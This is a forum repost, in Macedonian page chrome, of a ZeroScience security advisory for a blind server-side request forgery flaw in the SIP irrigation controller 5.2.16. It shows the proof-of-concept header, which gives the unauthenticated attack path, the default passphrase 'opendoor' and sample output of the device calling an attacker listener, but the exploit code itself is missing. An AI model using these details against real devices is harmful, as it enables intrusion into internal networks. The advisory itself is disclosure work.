Стани премиум член и добиј попуст на 2000+ производи и куп други бенефити!

SIP Sustainable Irrigation Platform 5.x (nr-url) Blind SSRF

zeroscience

ZSL Bot v4.89.1.00
31 мај 2010
1.097
660
www.zeroscience.mk
Python:
#!/usr/bin/env python3
#
#
# SIP Sustainable Irrigation Platform 5.x (nr-url) Blind SSRF
#
#
# Vendor: Dan-in-CA
# Product web page: https://github.com/Dan-in-CA/SIP
# Affected version: 5.2.16
#
# Summary: SIP is a free Raspberry Pi based Python program for
# controlling irrigation systems (sprinkler, drip, hydroponic,
# etc). It uses web technology to provide an intuitive user
# interface (UI) in several languages. The UI can be accessed
# in your favorite browser on desktop, laptop, and mobile devices.
# SIP has also been used to control pumps, lights, and other Irrigation
# related equipment.
#
# Desc: The application accepts an attacker-supplied callback URL
# and, when the optional Node-RED plugin is installed, later issues
# server-side HTTP requests to that URL without validating it. This
# can be exploited to make the device send requests to arbitrary internal
# or external systems on the attacker's behalf, reaching services
# that are otherwise not directly accessible. When the optional passphrase
# is not enabled (factory default) configuring the URL and triggering
# the request require no authentication, and where the passphrase is
# enabled it defaults to 'opendoor'.
#
# -----------------------------------------------------------------------
# $ python sip_ssrf.py 192.168.1.9 192.168.2.33 9000
# === SIP SSRF PoC :: TARGET=http://192.168.1.9 ===
# [*] Node-RED present (/jsin -> HTTP 200, ver="5.2.16")
#
# [*] nr-url payload : http://192.168.2.33:9000/ssrf-ZSL-PWN-1783027887
#     a) set callback (unauth)    -> HTTP 303
#     b) trigger outbound (unauth)-> HTTP 200
#
# [+] SSRF successful -- SIP made a server-side request to us:
#         2026-07-02T23:31:28.393794 HIT POST /ssrf-ZSL-PWN-1783027887 from=192.168.1.9 body='water level set to 42'
#
# Done.
#
# -----------------------------------------------------------------------
#
# Tested on: Debian GNU/Linux 11 (bullseye) raspberrypi 6.1.21+ (armv6l/aarch64)
#            Python 3.9.2
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2026-5998
# Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5998
#
#
# 24.06.2026
#

PoC killed by the awesome CF



 
462 членови онлајн
1.042.106мислења
51.209теми
37.452членови

Нови мислења

Офтопик

Последни огласи

ит маркет

На врв Дно